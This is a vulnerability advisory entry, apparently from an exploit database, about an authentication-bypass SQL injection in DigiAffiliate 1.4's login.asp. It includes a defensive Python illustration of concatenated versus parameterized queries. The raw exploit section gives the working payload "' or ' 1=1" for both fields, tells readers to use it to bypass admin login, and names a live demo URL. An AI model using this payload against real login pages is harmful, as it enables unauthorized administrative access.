Vendor: DigiAffiliate
By: d3b4gd
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: DigiAffiliate
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: YES
Related CWE: N/A
CPE: a:digiappz:digiaffiliate
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

DigiAffiliate <= V1.4 (Auth bypass) SQL Injection Vulnerability

DigiAffiliate version 1.4 suffers from an authentication bypass vulnerability due to a SQL injection flaw in the login.asp script. An attacker can exploit this vulnerability to gain administrative access to the application.

Mitigation:

Upgrade to the latest version of DigiAffiliate.
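
An added illustration, not code from the advisory or from DigiAffiliate: it assumes login.asp builds its login query by string concatenation (the page does not show the script's source) and models that in Python with an in-memory SQLite table, next to the parameterized form that rejects the same input. The table, column and function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the admin table (not DigiAffiliate's real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    # Constructed sample credentials; a real application would store a password hash.
    db.execute("INSERT INTO admins VALUES ('admin', 'S3cret-constructed')")
    return db

def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: user input is spliced into the SQL text."""
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone(), sql

def login_parameterized(db, username, password):
    """Hardened form: input is bound as data and is never parsed as SQL."""
    sql = "SELECT username FROM admins WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone(), sql

if __name__ == "__main__":
    db = make_db()
    value = "' or ' 1=1"  # the value quoted in the advisory for both fields
    for check in (login_concatenated, login_parameterized):
        row, sql = check(db, value, value)
        outcome = "authenticated as " + row[0] if row else "rejected"
        print(check.__name__ + ": " + outcome)
        print("    query text: " + sql)
```

In the concatenated query the quotes in the input close the string literal, so the trailing `or ' 1=1'` becomes part of the WHERE clause and matches every row; with bound parameters the same characters are compared literally against the stored values.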

Exploit-DB raw data:

###############################################################################################
[-] DigiAffiliate <= V1.4 (Auth bypass) SQL Injection Vulnerability
[-] Discovered By : d3b4gd
[-] Greetz : All my friends
################################################################################################
Use this information to bypass admin login

admin :   ' or ' 1=1
password: ' or ' 1=1

Live demo :

http://www.digiappz.com/digiaffiliate2/login.asp
--------------------------------------------
--------------------------------------------

# milw0rm.com [2008-11-08]